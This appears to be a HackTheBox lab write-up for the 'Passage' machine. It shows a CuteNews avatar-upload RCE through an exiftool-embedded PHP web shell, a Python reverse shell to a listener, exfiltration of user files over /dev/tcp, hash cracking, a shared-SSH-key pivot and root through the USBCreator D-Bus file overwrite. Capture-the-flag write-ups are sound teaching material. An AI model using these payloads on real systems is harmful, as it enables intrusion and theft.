HackTheBox - Passage

HackTheBox - Passage

Passage from HackTheBox hosts a news management software called CuteNews. The software is known to be vulnerable to a remote code execution, allowing me to gain code execution on the system via the avatar upload feature. Examining the source files of the software discovers a few password hashes that can be recovered using a dictionary attack. One of the recovered passwords can be used to escalate to a user. The user is using the same SSH key with another user. There is a unpatched package called USBCreator and it has vulnerability that allows an attacker to perform arbitrary file as root without supplying a password.

Skills Learned

  • CuteNews 2.1.2 exploitation

  • USBCreator D-bus exploitation




An initial nmap discovers two open ports, SSH on port 22 and HTTP running Apache web server on port 80.

→ root@kali «passage» «»
$ mkdir nmap; nmap -sC -sV -oN initial-passage -v
# Nmap 7.80 scan initiated Sat Sep  5 15:39:12 2020 as: nmap -sC -sV -oN initial-passage -v
Nmap scan report for
Host is up (0.074s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As SSH usually requires credentials, I’ll enumerate the web server on port 80.


TCP 80 - Website

The page presenting a kind of news website called “Passage News”.


The post titled “Implemented Fail2Ban” states that they have implemented the Fail2Ban feature. Knowing this, I will avoid any kind of brute force attack here.


Inspecting the page sources finds a directory called “CuteNews”. I also find the hostname passage.htb.


Adding /CuteNews to the URL redirects me to a login page.


I can register as normal user.



I threw “CuteNews 2.1.2” to searchsploit and it returned several exploits.

→ root@kali «passage» «»
$ searchsploit 'CuteNews 2.1.2'
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)       | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion                           | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload               | php/webapps/48458.txt
------------------------------------------------------------------- ---------------------------------

I’ll go with the ‘avatar’ RCE.


Shell as www-data

CuteNews CVE-2019-11447

It turns out the ‘avatar’ RCE exploit was a CVE. The exploit module description as follows:

This module exploits a command execution vulnerability in CuteNews prior to 2.1.2. The attacker can infiltrate the server through the avatar upload process in the profile area. There is no realistic control of the $imgsize function in “/core/modules/dashboard.php” Header content of the file can be changed and the control can be bypassed. We can use the “GIF” header for this process. An ordinary user is enough to exploit the vulnerability. No need for admin user. The module creates a file for you and allows RCE.

I can also exploit this manually.

I still have the payload that I made using exiftool in my previous Magic write-up. If I don’t have it, I can create a new one, embedding a PHP web shell as a comment.

→ root@kali «passage» «»
$ exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' iamf.jpg

I’ll rename my jpeg image to iamfr.php, and then I’ll upload it as my avatar (Dashboard –> Personal Options).


The image is located at http://passage.htb/CuteNews/uploads/avatar_iamf_iamfr.php


I’ll send a Python reverse shell through the web shell and capture it on my nc listener.

http://passage.htb/CuteNews/uploads/avatar_iamf_iamfr.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

I have an interactive shell now.

→ root@iamf «passage» «»
$ rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [] from (UNKNOWN) [] 37062
bash: cannot set terminal process group (1678): Inappropriate ioctl for device
bash: no job control in this shell
www-data@passage:/var/www/html/CuteNews/uploads$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@passage:/var/www/html/CuteNews/uploads$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@passage:/var/www/html/CuteNews/uploads$ export TERM=xterm-256color

Privilege Escalation

Shell as paul

Internal Enumeration

There are two users in home directory.

www-data@passage:/var/www/html/CuteNews/uploads$ ls -l /home
ls -l /home
total 8
drwxr-x--- 17 nadav nadav  4096 Mar 5 09:21 nadav
drwxr-x--- 17 paul  paul   4096 Mar 5 08:32 paul

On /var/www/html/CuteNews/cdata/users, I finds a bunch of PHP files contains data encoded in base64. Some of the file contains PHP tags.


Apologize for the image quality (also for the white background), it was recovered from my KeepNote app.

I’ll send those files to my machine as one file using cat and dev/tcp trick

www-data@passage:/var/www/html/CuteNews/cdata/users$ cat *.php > /dev/tcp/

I redirected it to a file called cdata.users.

→ root@iamf «passage» «»
$ nc -nvlp 9000 > cdata.users
listening on [any] 9000 ...
connect to [] from (UNKNOWN) [] 55022

I can perform a bulk decode on the file contents after removing the PHP tags.

→ root@iamf «passage» «»
$ cat cdata.users| sed 's/<?php[^>]*>//g' | base64 -d
cat cdata.users| sed 's/<?php[^>]*>//g' | base64 -d

And that was a mess.

Among these outputs, there is one that interesting.


hash-identifier identifies it as SHA-256.

→ root@kali «passage» «»
$ hash-identifier 84c7cd94cb0d818d27b16d4290d13703d380c54a4d3696fff4587b2862bf6068
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #

Possible Hashs:
[+] SHA-256
[+] Haval-256

It turns out that those exfiltrated files are how CuteNews stores its database (flat-file database, like /etc/passwd).


Knowing that, I can add another filter using grep to grab the password hashes.

→ root@kali «passage» «»
$ cat cdata.users| sed 's/<?php[^>]*>//g' | base64 -d | grep -o -E -e "[0-9a-f]{64}"

Cracking the Hashes

hashcat recovered five passwords.

$ ./hashcat.exe -m 1400 hashes/passage.hashes ../rockyou.txt -O --show

SU - paul

I tried to spray the passwords on SSH, but it wanted an SSH key. I tried again with su, and password atlanta1 worked on paul.

www-data@passage:/home$ su paul 
su paul
Password: atlanta1

Shell as nadav

Shared SSH keys

Escalating from paul to nadav is pretty straight forward, I found out that user nadav uses the same SSH keys as user paul.

paul@passage:~/.ssh$ cat id_rsa.pub && cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage

So I can just SSH from paul to nadav.

paul@passage:~/.ssh$ ssh nadav@passage.htb
Last login: Sun Sep  6 11:12:03 2020 from
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

Shell as root

Internal enumeration

Since nadav is a member of the sudo group, I can just type sudo su to escalate to root, but unfortunately it requires nadav’s password.

So I looking around nadav’s home directory, and there is a .viminfo file (not sure if it’s from the box or other players).


The file contains the following information.

# Command Line History (newest to oldest):

# File marks:
'0  12  7  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
'1  2  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

# Jumplist (newest first):
-'  12  7  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
-'  1  0  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
-'  2  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-'  1  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-'  2  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-'  1  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

# History of marks within files (newest to oldest):

> /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
        "       12      7

> /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
        "       2       0
        .       2       0
        +       2       0

The history of files points to these two configuration files:

  • /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
  • /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

The 51-ubuntu-admin.conf defines there are only two groups that can be used for authentication when administrator authentication is needed, sudo and admin. This file is used by Polkit, which allows unprivileged process to communicate with the privileged ones. In the GUI, the prompt that asks you to enter a password when performing an administrative tasks are using Polkit.

nadav@passage:~$ cat /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

I don’t really understand in depth about com.ubuntu.USBCreator.conf. What I know is, this configuration file is used by a service called “com.ubuntu.USBCreator” that is owned by root. The ones that can invoke the methods on this service are constrained by PolicyKit/Polkit, and they are anyone in the sudo or the admin group (defined by the 51-ubuntu-admin.conf file)

nadav@passage:~$ cat /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
<!DOCTYPE busconfig PUBLIC
 "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"

  <!-- Only root can own the service -->
  <policy user="root">
    <allow own="com.ubuntu.USBCreator"/>

  <!-- Allow anyone to invoke methods (further constrained by
       PolicyKit privileges -->
  <policy context="default">
    <allow send_destination="com.ubuntu.USBCreator"
    <allow send_destination="com.ubuntu.USBCreator"
    <allow send_destination="com.ubuntu.USBCreator"


From here, it looks only nadav that can invoke the methods of this service

USBCreator D-Bus Interface Vulnerability

There is a research about a vulnerability in USBCreator D-Bus Interface, which can be used for local privilege escalation1. The research summary as follows:

A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root - without supplying a password. This trivially leads to elevated privileges, for instance, by overwriting the shadow file and setting a password for root. The issue was resolved in June when Ubuntu patched the relevant packages in response to a vulnerability disclosure from Unit 42.

The bug was first reported in 20162, and the affected Ubuntu version is 16.04.


The current machine is not an exact match, but since the vulnerability is patched in 2019, it may affect this version too.

nadav@passage:~$ uname -a
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Sun Sep 6 14:31:10 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Overwrite authorized_keys

One of the tools used by the researcher to exploit the vulnerability is a CLI-based called gdbus.

With user nadav, I can try to overwrite the authorized_keys file contents in the root directory with my public key.

I’ll put my public key named key in /dev/shm/, and then I’ll invoke the following command:

nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /dev/shm/key /root/.ssh/authorized_keys true

I tried to login as root using my private key, and it worked.

→ root@kali «passage» «»
$ ssh -i root_rsa root@
Last login: Fri Mar  5 17:33:39 2020 from
root@passage:~# ls -l
total 12
drwxr-xr-x 2 root root 4096 Jul 21  2020 exploits

-r-------- 1 root root   33 Mar  5 17:05 root.txt